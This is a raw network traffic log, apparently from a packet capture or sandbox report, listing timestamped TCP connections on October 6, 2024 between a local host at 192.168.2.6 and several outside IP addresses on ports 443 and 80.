                                                                                                                            Oct 6, 2024 13:50:09.161669970 CEST49758443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.161808968 CEST49758443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.161828041 CEST4434975813.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.163245916 CEST49759443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.163256884 CEST4434975913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.163348913 CEST49759443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.164508104 CEST49760443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.164515972 CEST4434976013.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.164555073 CEST49760443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.164937019 CEST49757443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.164951086 CEST4434975713.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.167176008 CEST49759443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.167186975 CEST4434975913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.167280912 CEST49760443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.167290926 CEST4434976013.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.304013014 CEST4976680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.308866978 CEST8049766165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.308939934 CEST4976680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.321475029 CEST49767443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.321512938 CEST4434976723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.321660042 CEST49767443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.323374987 CEST49768443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:09.323417902 CEST44349768104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.323543072 CEST49768443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:09.324763060 CEST49769443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.324791908 CEST4434976923.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.325378895 CEST49769443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.327740908 CEST49770443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.327753067 CEST4434977023.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.327845097 CEST49770443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.328691959 CEST49771443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.328712940 CEST4434977123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.328980923 CEST49771443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.341568947 CEST49772443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.341597080 CEST4434977223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.341649055 CEST49772443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.342147112 CEST4974080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.342339039 CEST4975080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.342638969 CEST4973980192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.344074965 CEST49767443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.344089031 CEST4434976723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.344868898 CEST49773443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:09.344876051 CEST44349773142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.344937086 CEST49773443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:09.345480919 CEST49774443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:09.345485926 CEST44349774142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.345573902 CEST49774443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:09.347002029 CEST49776443192.168.2.6151.101.130.137
                                                                                                                            Oct 6, 2024 13:50:09.347027063 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.347090960 CEST49776443192.168.2.6151.101.130.137
                                                                                                                            Oct 6, 2024 13:50:09.347888947 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.347903967 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.347979069 CEST49769443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.347990036 CEST4434976923.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.348352909 CEST49768443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:09.348368883 CEST44349768104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.348412037 CEST8049739165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.348787069 CEST49770443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.348799944 CEST4434977023.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.348958015 CEST49771443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.348974943 CEST4434977123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.349280119 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:09.349322081 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.349431992 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:09.350502014 CEST49778443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:09.350512028 CEST44349778104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.350564003 CEST49778443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:09.350982904 CEST49772443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.350999117 CEST4434977223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.500322104 CEST49773443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:09.500339031 CEST44349773142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.500710011 CEST49774443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:09.500727892 CEST44349774142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.501837969 CEST49776443192.168.2.6151.101.130.137
                                                                                                                            Oct 6, 2024 13:50:09.501857042 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.503397942 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:09.503442049 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.503890991 CEST49778443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:09.503904104 CEST44349778104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.504945993 CEST4976680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.509695053 CEST8049766165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.520365953 CEST44349754184.28.90.27192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.520430088 CEST49754443192.168.2.6184.28.90.27
                                                                                                                            Oct 6, 2024 13:50:09.538363934 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.539598942 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:09.539617062 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.541084051 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.541150093 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:09.543634892 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:09.543781042 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.543997049 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:09.544003963 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.568169117 CEST49754443192.168.2.6184.28.90.27
                                                                                                                            Oct 6, 2024 13:50:09.568195105 CEST44349754184.28.90.27192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.568470955 CEST44349754184.28.90.27192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.668000937 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.668044090 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.668056011 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.668085098 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.668100119 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.668143034 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.668139935 CEST4974080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.668158054 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.668232918 CEST4974080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.668234110 CEST4974080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.668922901 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.668939114 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.668955088 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.668973923 CEST4974080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.668994904 CEST4974080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.668997049 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.669012070 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.669189930 CEST4974080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.669630051 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.670089006 CEST8049739165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.670104980 CEST8049739165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.670152903 CEST4973980192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.670156956 CEST8049739165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.670172930 CEST8049739165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.670216084 CEST4973980192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.670396090 CEST8049739165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.670439005 CEST8049739165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.670453072 CEST8049739165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.670492887 CEST4973980192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.670505047 CEST8049739165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.670521021 CEST8049739165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.670559883 CEST4973980192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.671283960 CEST8049739165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.671365023 CEST4973980192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.676305056 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.676320076 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.676336050 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.676398039 CEST4975080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.676444054 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.676457882 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.676477909 CEST4975080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.676680088 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.676729918 CEST4975080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.676881075 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.676894903 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.676911116 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.676951885 CEST4975080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.676974058 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.676989079 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.677031040 CEST4975080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.677728891 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.677769899 CEST4975080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.755431890 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.755510092 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:09.758337975 CEST49754443192.168.2.6184.28.90.27
                                                                                                                            Oct 6, 2024 13:50:09.758455038 CEST4974080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.758625031 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.799052954 CEST4434976723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.803785086 CEST44349768104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.805447102 CEST4434977223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.806245089 CEST49768443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:09.806245089 CEST49767443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.806255102 CEST44349768104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.806262970 CEST4434976723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.806586027 CEST44349768104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.807265997 CEST49754443192.168.2.6184.28.90.27
                                                                                                                            Oct 6, 2024 13:50:09.807303905 CEST4434976723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.807413101 CEST49767443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.808815956 CEST49768443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:09.808954954 CEST44349768104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.809720039 CEST49772443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.809747934 CEST4434977223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.810856104 CEST49767443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.810924053 CEST4434976723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.811136961 CEST49768443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:09.811304092 CEST49767443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.811311960 CEST4434976723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.812156916 CEST4434977123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.812618971 CEST4434976923.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.813278913 CEST4434977223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.813359976 CEST49772443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.815234900 CEST49771443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.815249920 CEST4434977123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.816003084 CEST49769443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.816020966 CEST4434976923.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.816308022 CEST4434977123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.816359997 CEST49771443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.816485882 CEST4434976923.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.818499088 CEST49772443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.818670034 CEST4434977223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.820472002 CEST49771443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.820554972 CEST4434977123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.821321964 CEST49769443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.821403027 CEST4434976923.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.822139978 CEST49772443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.822155952 CEST4434977223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.822616100 CEST49771443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.822622061 CEST4434977123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.822971106 CEST49769443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.826159954 CEST4434976013.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.827001095 CEST4434977023.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.827236891 CEST49760443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.827254057 CEST4434976013.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.827301025 CEST4434975913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.828223944 CEST49760443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.828229904 CEST4434976013.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.828711987 CEST49770443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.828718901 CEST4434977023.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.829746008 CEST49759443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.829761982 CEST4434975913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.830388069 CEST49759443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.830393076 CEST4434975913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.832258940 CEST4434977023.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.832308054 CEST49770443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.833297968 CEST49770443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.833457947 CEST4434977023.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.834877014 CEST49770443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.834883928 CEST4434977023.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.840538979 CEST4434975713.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.841619968 CEST49757443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.841639996 CEST4434975713.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.842950106 CEST49757443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.842955112 CEST4434975713.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.846606016 CEST4434975613.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.847187996 CEST49756443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.847203016 CEST4434975613.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.848021984 CEST49756443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.848026991 CEST4434975613.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.849952936 CEST4434975813.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.851413012 CEST44349754184.28.90.27192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.852102041 CEST49758443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.852133036 CEST4434975813.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.853032112 CEST49758443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.853038073 CEST4434975813.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.855410099 CEST44349768104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.867404938 CEST4434976923.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.894792080 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.894855976 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.894921064 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.894938946 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:09.895009995 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.895049095 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:09.895071983 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:09.895669937 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.895715952 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.895736933 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:09.895751953 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.895791054 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:09.895791054 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:09.895829916 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.896724939 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.896754980 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.896905899 CEST4974080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.896960020 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.897001982 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.897046089 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:09.897059917 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.897092104 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:09.912513971 CEST49767443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.912566900 CEST49770443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.916910887 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.916943073 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.916958094 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.916996002 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.917011023 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.917016029 CEST4975080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.917037964 CEST4975080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.917314053 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.917326927 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.917365074 CEST4975080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.917480946 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.917509079 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.917524099 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.917546034 CEST4975080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.917570114 CEST4975080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.917594910 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.917614937 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.917658091 CEST4975080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.918332100 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.918400049 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.918414116 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.918427944 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.918440104 CEST4975080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.918488979 CEST4975080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.924747944 CEST4434976013.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.924901009 CEST4434976013.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.924972057 CEST49760443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.927753925 CEST4434975913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.927788019 CEST4434975913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.927860022 CEST4434975913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.927869081 CEST49759443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.927896976 CEST49759443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.942363024 CEST4434976723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.942444086 CEST4434976723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.942476988 CEST4434976723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.942491055 CEST49767443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.942503929 CEST4434976723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.942536116 CEST4434976723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.942564964 CEST4434976723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.942576885 CEST49767443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.942584038 CEST4434976723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.942608118 CEST49767443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.943941116 CEST4434975713.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.943962097 CEST4434975713.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.944125891 CEST4434975713.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.944149971 CEST49757443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.944209099 CEST49757443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.944547892 CEST49760443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.944566011 CEST4434976013.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.944577932 CEST49760443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.944585085 CEST4434976013.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.949244022 CEST49757443192.168.2.613.107.246.60
